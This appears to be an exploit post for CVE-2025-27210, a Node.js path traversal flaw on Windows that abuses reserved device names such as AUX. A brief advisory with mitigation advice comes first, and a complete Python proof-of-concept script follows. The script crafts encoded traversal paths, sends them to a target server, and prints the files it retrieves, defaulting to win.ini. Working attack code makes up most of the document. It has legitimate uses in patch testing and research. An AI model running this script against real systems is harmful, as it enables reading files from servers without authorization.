Date: July 2025
Platform: Node.js (Windows)
CVE ID: CVE-2025-27210
🧠 Vulnerability Summary
CVE-2025-27210 is a critical Path Traversal vulnerability affecting Node.js 24.x on Windows systems.
The issue lies in how certain reserved device filenames like AUX, CON, or NUL can be used to bypass directory traversal protections.
Attackers may leverage sequences like ..\\AUX\\..\\ to access sensitive files on the server.
🔍 Technical Details
- Targeted OS: Windows
- Affected Environment: Node.js-based file servers or routers
- Impact: Unauthorized file disclosure
- Method: Exploiting
path.normalize()orpath.join()logic
🛡️ Recommendations
- Upgrade to the latest patched version of Node.js when available
- Implement strict allowlists for file paths in web apps
- Block or sanitize reserved Windows device names
- Use
path.resolve()combined with known root path verification
📚 References
Always test responsibly and never exploit systems without permission.
Proof of Concept (PoC)
poc.py
# Exploit Author : Abdualhadi khalifa
# CVE : CVE-2025-27210
import argparse
import requests
import urllib.parse
import json
import sys
def exploit_path_traversal_precise(target_url: str, target_file: str, method: str) -> dict:
traverse_sequence = "..\\" * 6
normalized_target_file = target_file.replace("C:", "").lstrip("\\/")
malicious_path = f"{traverse_sequence}AUX\\..\\{normalized_target_file}"
encoded_malicious_path = urllib.parse.quote(malicious_path, safe='')
full_url = f"{target_url}/{encoded_malicious_path}"
response_data = {
"target_url": target_url,
"target_file_attempted": target_file,
"malicious_path_sent_raw": malicious_path,
"malicious_path_sent_encoded": encoded_malicious_path,
"full_request_url": full_url,
"http_method": method,
"success": False,
"response_status_code": None,
"response_content_length": None,
"extracted_content": None,
"error_message": None
}
try:
print(f"[*] Preparing precise Path Traversal exploit...")
print(f"[*] Malicious Path (Encoded): {encoded_malicious_path}")
print(f"[*] Request URL: {full_url}")
if method.upper() == 'GET':
response = requests.get(full_url, timeout=15)
elif method.upper() == 'POST':
response = requests.post(f"{target_url}", params={'filename': encoded_malicious_path}, timeout=15)
else:
raise ValueError("Unsupported HTTP method. Use 'GET' or 'POST'.")
response_data["response_status_code"] = response.status_code
response_data["response_content_length"] = len(response.content)
if response.status_code == 200:
content = response.text
response_data["extracted_content"] = content
if target_file.lower().endswith("win.ini") and "[windows]" in content.lower():
response_data["success"] = True
elif len(content) > 0: # For any other file, just check for non-empty content.
response_data["success"] = True
else:
response_data["error_message"] = "Received 200 OK, but content is empty or unexpected."
else:
response_data["error_message"] = f"Server responded with non-200 status code: {response.status_code}"
except requests.exceptions.Timeout:
response_data["error_message"] = "Request timed out. Server might be slow or unresponsive."
except requests.exceptions.ConnectionError:
response_data["error_message"] = "Connection failed to target. Ensure the Node.js application is running and accessible."
except ValueError as ve:
response_data["error_message"] = str(ve)
except Exception as e:
response_data["error_message"] = f"An unexpected error occurred: {str(e)}"
return response_data
def main():
parser = argparse.ArgumentParser(
prog="CVE-2025-27210_NodeJS_Path_Traversal_Exploiter.py",
description="""
Proof of Concept (PoC) for a precise Path Traversal vulnerability in Node.js on Windows (CVE-2025-27210).
This script leverages how Node.js functions (like path.normalize() or path.join())
might mishandle reserved Windows device file names (e.g., CON, AUX) within Path Traversal
sequences.
""",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument(
"-t", "--target",
type=str,
required=True,
help="Base URL of the vulnerable Node.js application endpoint (e.g., http://localhost:3000/files)."
)
parser.add_argument(
"-f", "--file",
type=str,
default="C:\\Windows\\win.ini",
help="""Absolute path to the target file on the Windows system.
Examples: C:\\Windows\\win.ini, C:\\secret.txt, C:\\Users\\Public\\Documents\\important.docx
"""
)
parser.add_argument(
"-m", "--method",
type=str,
choices=["GET", "POST"],
default="GET",
help="HTTP method for the request ('GET' or 'POST')."
)
args = parser.parse_args()
# --- CLI Output Formatting ---
print("\n" + "="*70)
print(" CVE-2025-27210 Node.js Path Traversal Exploit PoC")
print("="*70)
print(f"[*] Target URL: {args.target}")
print(f"[*] Target File: {args.file}")
print(f"[*] HTTP Method: {args.method}")
print("-"*70 + "\n")
result = exploit_path_traversal_precise(args.target, args.file, args.method)
print("\n" + "-"*70)
print(" Exploit Results")
print("-"*70)
print(f" Request URL: {result['full_request_url']}")
print(f" Malicious Path Sent (Raw): {result['malicious_path_sent_raw']}")
print(f" Malicious Path Sent (Encoded): {result['malicious_path_sent_encoded']}")
print(f" Response Status Code: {result['response_status_code']}")
print(f" Response Content Length: {result['response_content_length']} bytes")
if result["success"]:
print("\n [+] File successfully retrieved! Content below:")
print(" " + "="*66)
print(result["extracted_content"])
print(" " + "="*66)
else:
print("\n [-] File retrieval failed or unexpected content received.")
if result["error_message"]:
print(f" Error: {result['error_message']}")
elif result["extracted_content"]:
print("\n Response content (partial, may indicate server error or unexpected data):")
print(" " + "-"*66)
# Truncate long content if not fully successful
print(result["extracted_content"][:1000] + "..." if len(result["extracted_content"]) > 1000 else result["extracted_content"])
print(" " + "-"*66)
print("\n" + "="*70)
print(" Complete")
print("="*70 + "\n")
if __name__ == "__main__":
main()